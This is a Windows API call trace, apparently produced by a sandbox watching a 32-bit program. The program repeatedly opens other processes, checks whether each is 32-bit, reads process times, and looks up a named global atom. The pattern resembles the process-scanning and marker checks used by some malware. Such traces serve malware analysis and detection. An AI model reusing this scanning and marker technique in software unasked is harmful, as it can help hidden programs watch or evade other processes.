	[0134.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.739] CloseHandle (hObject=0x2dc) returned 1
	[0134.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.740] CloseHandle (hObject=0x2dc) returned 1
	[0134.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.772] CloseHandle (hObject=0x2dc) returned 1
	[0134.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.772] CloseHandle (hObject=0x2dc) returned 1
	[0134.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.772] CloseHandle (hObject=0x2dc) returned 1
	[0134.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.772] CloseHandle (hObject=0x2dc) returned 1
	[0134.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.773] CloseHandle (hObject=0x2dc) returned 1
	[0134.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.773] CloseHandle (hObject=0x2dc) returned 1
	[0134.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.773] CloseHandle (hObject=0x2dc) returned 1
	[0134.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.773] CloseHandle (hObject=0x2dc) returned 1
	[0134.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.774] CloseHandle (hObject=0x2dc) returned 1
	[0134.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.774] CloseHandle (hObject=0x2dc) returned 1
	[0134.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.774] CloseHandle (hObject=0x2dc) returned 1
	[0134.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.774] CloseHandle (hObject=0x2dc) returned 1
	[0134.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.775] CloseHandle (hObject=0x2dc) returned 1
	[0134.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.775] CloseHandle (hObject=0x2dc) returned 1
	[0134.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.775] CloseHandle (hObject=0x2dc) returned 1
	[0134.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.775] CloseHandle (hObject=0x2dc) returned 1
	[0134.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.776] CloseHandle (hObject=0x2dc) returned 1
	[0134.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.776] CloseHandle (hObject=0x2dc) returned 1
	[0134.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.776] CloseHandle (hObject=0x2dc) returned 1
	[0134.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.776] CloseHandle (hObject=0x2dc) returned 1
	[0134.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.777] CloseHandle (hObject=0x2dc) returned 1
	[0134.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.777] CloseHandle (hObject=0x2dc) returned 1
	[0134.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.777] CloseHandle (hObject=0x2dc) returned 1
	[0134.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.777] CloseHandle (hObject=0x2dc) returned 1
	[0134.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.778] CloseHandle (hObject=0x2dc) returned 1
	[0134.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.778] CloseHandle (hObject=0x2dc) returned 1
	[0134.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.778] CloseHandle (hObject=0x2dc) returned 1
	[0134.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.778] CloseHandle (hObject=0x2dc) returned 1
	[0134.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.779] CloseHandle (hObject=0x2dc) returned 1
	[0134.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.779] CloseHandle (hObject=0x2dc) returned 1
	[0134.779] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.779] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.779] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.780] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.780] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.780] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.780] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.781] CloseHandle (hObject=0x2dc) returned 1
	[0134.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.781] CloseHandle (hObject=0x2dc) returned 1
	[0134.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.781] CloseHandle (hObject=0x2dc) returned 1
	[0134.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.781] CloseHandle (hObject=0x2dc) returned 1
	[0134.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.782] CloseHandle (hObject=0x2dc) returned 1
	[0134.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.782] CloseHandle (hObject=0x2dc) returned 1
	[0134.817] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.817] CloseHandle (hObject=0x2dc) returned 1
	[0134.817] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.817] CloseHandle (hObject=0x2dc) returned 1
	[0134.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.818] CloseHandle (hObject=0x2dc) returned 1
	[0134.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.818] CloseHandle (hObject=0x2dc) returned 1
	[0134.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.818] CloseHandle (hObject=0x2dc) returned 1
	[0134.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.819] CloseHandle (hObject=0x2dc) returned 1
	[0134.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.819] CloseHandle (hObject=0x2dc) returned 1
	[0134.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.819] CloseHandle (hObject=0x2dc) returned 1
	[0134.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.820] CloseHandle (hObject=0x2dc) returned 1
	[0134.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.820] CloseHandle (hObject=0x2dc) returned 1
	[0134.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.820] CloseHandle (hObject=0x2dc) returned 1
	[0134.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.821] CloseHandle (hObject=0x2dc) returned 1
	[0134.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.821] CloseHandle (hObject=0x2dc) returned 1
	[0134.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.821] CloseHandle (hObject=0x2dc) returned 1
	[0134.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.822] CloseHandle (hObject=0x2dc) returned 1
	[0134.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.822] CloseHandle (hObject=0x2dc) returned 1
	[0134.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.822] CloseHandle (hObject=0x2dc) returned 1
	[0134.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.823] CloseHandle (hObject=0x2dc) returned 1
	[0134.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.823] CloseHandle (hObject=0x2dc) returned 1
	[0134.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.823] CloseHandle (hObject=0x2dc) returned 1
	[0134.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.823] CloseHandle (hObject=0x2dc) returned 1
	[0134.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.824] CloseHandle (hObject=0x2dc) returned 1
	[0134.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.824] CloseHandle (hObject=0x2dc) returned 1
	[0134.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.824] CloseHandle (hObject=0x2dc) returned 1
	[0134.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.825] CloseHandle (hObject=0x2dc) returned 1
	[0134.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.825] CloseHandle (hObject=0x2dc) returned 1
	[0134.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.825] CloseHandle (hObject=0x2dc) returned 1
	[0134.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.825] CloseHandle (hObject=0x2dc) returned 1
	[0134.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.826] CloseHandle (hObject=0x2dc) returned 1
	[0134.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.826] CloseHandle (hObject=0x2dc) returned 1
	[0134.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.827] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.828] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.829] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.829] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.829] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.829] CloseHandle (hObject=0x2dc) returned 1
	[0134.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.829] CloseHandle (hObject=0x2dc) returned 1
	[0134.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.830] CloseHandle (hObject=0x2dc) returned 1
	[0134.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.830] CloseHandle (hObject=0x2dc) returned 1
	[0134.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.830] CloseHandle (hObject=0x2dc) returned 1
	[0134.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.830] CloseHandle (hObject=0x2dc) returned 1
	[0134.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.865] CloseHandle (hObject=0x2dc) returned 1
	[0134.865] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.866] CloseHandle (hObject=0x2dc) returned 1
	[0134.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.866] CloseHandle (hObject=0x2dc) returned 1
	[0134.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.866] CloseHandle (hObject=0x2dc) returned 1
	[0134.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.866] CloseHandle (hObject=0x2dc) returned 1
	[0134.866] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.867] CloseHandle (hObject=0x2dc) returned 1
	[0134.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.867] CloseHandle (hObject=0x2dc) returned 1
	[0134.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.867] CloseHandle (hObject=0x2dc) returned 1
	[0134.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.867] CloseHandle (hObject=0x2dc) returned 1
	[0134.867] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.867] CloseHandle (hObject=0x2dc) returned 1
	[0134.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.868] CloseHandle (hObject=0x2dc) returned 1
	[0134.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.868] CloseHandle (hObject=0x2dc) returned 1
	[0134.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.868] CloseHandle (hObject=0x2dc) returned 1
	[0134.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.868] CloseHandle (hObject=0x2dc) returned 1
	[0134.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.869] CloseHandle (hObject=0x2dc) returned 1
	[0134.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.869] CloseHandle (hObject=0x2dc) returned 1
	[0134.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.869] CloseHandle (hObject=0x2dc) returned 1
	[0134.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.869] CloseHandle (hObject=0x2dc) returned 1
	[0134.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.870] CloseHandle (hObject=0x2dc) returned 1
	[0134.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.870] CloseHandle (hObject=0x2dc) returned 1
	[0134.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.870] CloseHandle (hObject=0x2dc) returned 1
	[0134.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.870] CloseHandle (hObject=0x2dc) returned 1
	[0134.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.871] CloseHandle (hObject=0x2dc) returned 1
	[0134.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.871] CloseHandle (hObject=0x2dc) returned 1
	[0134.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.871] CloseHandle (hObject=0x2dc) returned 1
	[0134.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.871] CloseHandle (hObject=0x2dc) returned 1
	[0134.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.872] CloseHandle (hObject=0x2dc) returned 1
	[0134.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.872] CloseHandle (hObject=0x2dc) returned 1
	[0134.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.872] CloseHandle (hObject=0x2dc) returned 1
	[0134.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.872] CloseHandle (hObject=0x2dc) returned 1
	[0136.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0136.189] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.190] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.190] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.190] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.191] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.191] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.191] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.191] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.191] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.191] CloseHandle (hObject=0x2dc) returned 1
	[0136.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0136.192] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.192] CloseHandle (hObject=0x2dc) returned 1
	[0136.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0136.192] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.192] CloseHandle (hObject=0x2dc) returned 1
	[0136.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0136.192] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.192] CloseHandle (hObject=0x2dc) returned 1
	[0136.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0136.193] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.193] CloseHandle (hObject=0x2dc) returned 1
	[0136.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0136.193] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.193] CloseHandle (hObject=0x2dc) returned 1
	[0136.227] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.227] CloseHandle (hObject=0x2dc) returned 1
	[0136.227] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.227] CloseHandle (hObject=0x2dc) returned 1
	[0136.227] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.227] CloseHandle (hObject=0x2dc) returned 1
	[0136.228] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.228] CloseHandle (hObject=0x2dc) returned 1
	[0136.228] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.228] CloseHandle (hObject=0x2dc) returned 1
	[0136.228] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.228] CloseHandle (hObject=0x2dc) returned 1
	[0136.228] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.228] CloseHandle (hObject=0x2dc) returned 1
	[0136.229] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.229] CloseHandle (hObject=0x2dc) returned 1
	[0136.229] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.229] CloseHandle (hObject=0x2dc) returned 1
	[0136.229] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.229] CloseHandle (hObject=0x2dc) returned 1
	[0136.229] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.229] CloseHandle (hObject=0x2dc) returned 1
	[0136.230] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.230] CloseHandle (hObject=0x2dc) returned 1
	[0136.230] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.230] CloseHandle (hObject=0x2dc) returned 1
	[0136.230] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.230] CloseHandle (hObject=0x2dc) returned 1
	[0136.230] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.230] CloseHandle (hObject=0x2dc) returned 1
	[0136.231] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.231] CloseHandle (hObject=0x2dc) returned 1
	[0136.231] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.231] CloseHandle (hObject=0x2dc) returned 1
	[0136.231] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.231] CloseHandle (hObject=0x2dc) returned 1
	[0136.231] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.231] CloseHandle (hObject=0x2dc) returned 1
	[0136.231] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.232] CloseHandle (hObject=0x2dc) returned 1
	[0136.232] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.232] CloseHandle (hObject=0x2dc) returned 1
	[0136.232] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.232] CloseHandle (hObject=0x2dc) returned 1
	[0136.232] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.233] CloseHandle (hObject=0x2dc) returned 1
	[0136.233] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.233] CloseHandle (hObject=0x2dc) returned 1
	[0136.233] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.233] CloseHandle (hObject=0x2dc) returned 1
	[0136.233] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.233] CloseHandle (hObject=0x2dc) returned 1
	[0136.233] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.233] CloseHandle (hObject=0x2dc) returned 1
	[0136.234] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.234] CloseHandle (hObject=0x2dc) returned 1
	[0136.234] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.234] CloseHandle (hObject=0x2dc) returned 1
	[0136.234] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.234] CloseHandle (hObject=0x2dc) returned 1
	[0136.235] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
